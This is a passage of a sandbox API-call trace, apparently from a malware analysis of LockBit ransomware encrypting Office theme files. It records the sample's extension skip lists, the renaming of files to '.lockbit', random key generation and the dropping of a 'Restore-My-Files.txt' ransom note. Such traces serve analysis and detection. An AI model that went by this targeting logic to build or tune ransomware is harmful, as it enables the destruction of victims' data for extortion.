[0195.345] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.345] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.345] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.345] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Thatch.eftx") returned -1 [0195.345] lstrcmpiW (lpString1="ntldr", lpString2="Thatch.eftx") returned -1 [0195.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Thatch.eftx") returned -1 [0195.346] lstrcmpiW (lpString1="bootsect.bak", lpString2="Thatch.eftx") returned -1 [0195.346] lstrcmpiW (lpString1="autorun.inf", lpString2="Thatch.eftx") returned -1 [0195.346] lstrcmpiW (lpString1="thumbs.db", lpString2="Thatch.eftx") returned 1 [0195.346] lstrcmpiW (lpString1="iconcache.db", lpString2="Thatch.eftx") returned -1 [0195.346] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.346] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned=".eftx" [0195.346] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.346] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.346] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.347] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.347] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.lockbit") returned 87 [0195.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.348] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.349] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.349] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=41295) returned 1 [0195.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.367] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.371] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.371] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.372] free (_Block=0x1fa2ed8) [0195.372] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.372] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ad2400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x35ad2400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1fb84, dwReserved0=0x0, dwReserved1=0x0, cFileName="Trek.eftx", cAlternateFileName="TREK~1.EFT")) returned 1 [0195.373] lstrcmpiW (lpString1=".", lpString2="Trek.eftx") returned -1 [0195.373] lstrcmpiW (lpString1="..", lpString2="Trek.eftx") returned -1 [0195.373] PathFindExtensionW (pszPath="Trek.eftx") returned=".eftx" [0195.373] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.373] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.373] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.374] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.374] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.374] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.374] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.374] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.374] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.375] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="ntldr", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="autorun.inf", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="thumbs.db", lpString2="Trek.eftx") returned -1 [0195.375] lstrcmpiW (lpString1="iconcache.db", lpString2="Trek.eftx") returned -1 [0195.375] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.375] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned=".eftx" [0195.375] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.375] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.375] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.375] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.375] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.376] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.376] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.376] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.lockbit") returned 85 [0195.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0195.378] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.378] malloc (_Size=0x40068) returned 0x3d70450 [0195.378] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=129924) returned 1 [0195.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0195.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0195.379] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0195.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.386] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.386] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0195.388] free (_Block=0x1fa2ed8) [0195.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.388] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3940ab00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3940ab00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x4c9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Urban.eftx", cAlternateFileName="URBAN~1.EFT")) returned 1 [0195.388] lstrcmpiW (lpString1=".", lpString2="Urban.eftx") returned -1 [0195.388] lstrcmpiW (lpString1="..", lpString2="Urban.eftx") returned -1 [0195.388] PathFindExtensionW (pszPath="Urban.eftx") returned=".eftx" [0195.388] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.388] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.388] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.388] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.388] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.388] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.388] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.388] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.388] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.388] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.389] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.389] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.390] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Urban.eftx") returned -1 [0195.390] lstrcmpiW (lpString1="ntldr", lpString2="Urban.eftx") returned -1 [0195.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Urban.eftx") returned -1 [0195.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="Urban.eftx") returned -1 [0195.390] lstrcmpiW (lpString1="autorun.inf", lpString2="Urban.eftx") returned -1 [0195.391] lstrcmpiW (lpString1="thumbs.db", lpString2="Urban.eftx") returned -1 [0195.391] lstrcmpiW (lpString1="iconcache.db", lpString2="Urban.eftx") returned -1 [0195.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.391] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned=".eftx" [0195.391] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.391] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.391] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.391] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.391] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.392] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.392] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.lockbit") returned 86 [0195.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.399] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.399] malloc (_Size=0x40068) returned 0x3f70048 [0195.399] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=19611) returned 1 [0195.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0195.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0195.401] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0195.403] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme 